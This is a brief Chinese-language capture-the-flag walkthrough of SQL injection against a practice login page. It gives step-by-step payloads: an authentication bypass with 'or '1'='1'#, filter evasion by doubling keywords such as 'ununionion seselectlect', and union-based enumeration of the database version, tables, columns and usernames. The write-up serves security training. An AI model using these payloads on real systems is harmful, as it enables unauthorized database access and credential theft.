1.打开靶场先万能密码登陆试试admin or 11 #不对报错可以看到url那就用hackbar插件即可http://247a799f-8fd9-4124-9ddfcheck.php?usernameadmin%27or%271%27%3D%271%27%23password1232.找闭合‘提示报错提示进行了过滤我们就常规尝试一下过滤了什么:说明union select 和#都被过滤了那就选择双写/编码替换1 ununionion seselectlect 1,2,3%23发现回显23就可以正常注入了3.依次爆破1.版本和库名 1 ununionion seselectlect 1,version(),database()%23 [10.3.18-MariaDB,geek 2.表名 ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schemadatabase()%23 [b4bsql,geekuser 3.列名1 ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schemadatabase() anandd table_namegeekuser%23 4.字段 ununionion seselectlect 1,2,group_concat(username) frfromom geekuser%23 发现不是就去看看b4bsql库 如过显示不全可以commandu看源代码